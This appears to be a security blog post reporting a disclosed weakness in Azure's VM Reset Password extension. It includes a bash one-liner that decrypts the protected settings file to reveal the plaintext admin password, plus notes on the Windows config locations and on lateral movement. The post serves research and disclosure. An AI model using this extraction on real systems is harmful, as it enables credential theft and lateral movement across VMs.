Extract plain-text password from Azure VM Reset Password feature

Reset password is a common feature that allows you to create or reset a local administrator account on Azure VM. This feature is helpful when you forgot the account used to log into your VM. There would be a question from an InfoSec guy – can such a password be viewable in the format of plain text? In another word, is it possible technically to gain that password?

In this article, I would like to provide a demonstration of how to extract the password that you use from the Reset Password feature.

Again, Reset Password allows you to reset the local administrator account’s password on Azure VM (both Windows and Linux).

This can be done from Azure Portal, command line, or VM Azure Extension. When you reset a password Azure drops a directory on the target VM named Microsoft.OSTCExtensions.VMAccessForLinux-{version}/  

If you read this article, you would probably have an idea of what to look for in every VM extension. Unfortunately, Microsoft knew what was wrong then they redacted the cert thumbprint to ‘avoid‘ you from decoding the cipher.

This redact function is done in /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.5.11/Utils/handlerutil2.py

However, this is not what redact solution addressed as a whole. The Linux Agent does something in the opposite. It simply checks and collects extension information (for status reporting purposes) and write the information to a file name VmSettings.{number}.json or ExtensionConfig.{number}.xml in /var/lib/waagent. Read this file you will see a funny thing – the protected settings are redacted, and the cert thumbprint are shown.

Now you have everything you need. Run the following code snippet to just see what the password was set.

#!/bin/bash
# This script can be used to decode VM Access Extension when you have cert thumbprint.
cert_thumbprint="B6FD1D26C4447AF220C31BAD935CD1BA38AD9CE4"
setting_file="/var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.5.11/config/0.settings"

jq -r '.runtimeSettings[].handlerSettings.protectedSettings' "$setting_file" | base64 --decode | openssl smime -inform DER -decrypt -recip ../"${cert_thumbprint}".crt -inkey ../"${cert_thumbprint}".prv | jq .

During my research, I noticed that if I restarted Azure Linux Agent (systemctl restart waagent) the protectedSettingCertThumbprint was set back to what it was.  The reason is that the handlerutil2.py that does the redact can only be triggered when you make a call to VM Access Extension (when you reset password using the Reset Password feature).

You may also notice that the cert thumbprint used in every extension configuration is one so you could just use that one for the decoding.

What about Windows?

For Windows VM, at the time when I reported the extension configuration was written to a storage account’s blob file. The full blob URL was stored at InVMArtifactsProfileBlob  in an XML file stored in C:\WindowsAzure\Config

By opening the Blob file (I was able to get the extension configuration information

I was able to read the password then using this script

Conclusion

Although to extract plain-text of local admin on Linux or Windows VM requires root/administrative privilege it is still not good to leave this feature vulnerable. That local admin would be used for all other VMs if they are deployed using template or from a CM solution (e.g., Ansible or Chef). Hence an attacker could compromise one VM and uses that local admin’s credential to check other VMs and laterally move.

Disclosure Timeline

  • December 1, 2021 – Reported to MSRC.
  • December 2, 2021 – Microsoft received the report and investigated
  • January 26, 2022 – Microsoft closed the case because root/administrative privilege is required to exploit. This doesn’t meet the bar for servicing.
  • January 26, 2022 – Published an article in AzSec
This entry was posted in Security Operation and tagged . Bookmark the permalink.

Leave a Reply

Your email address will not be published.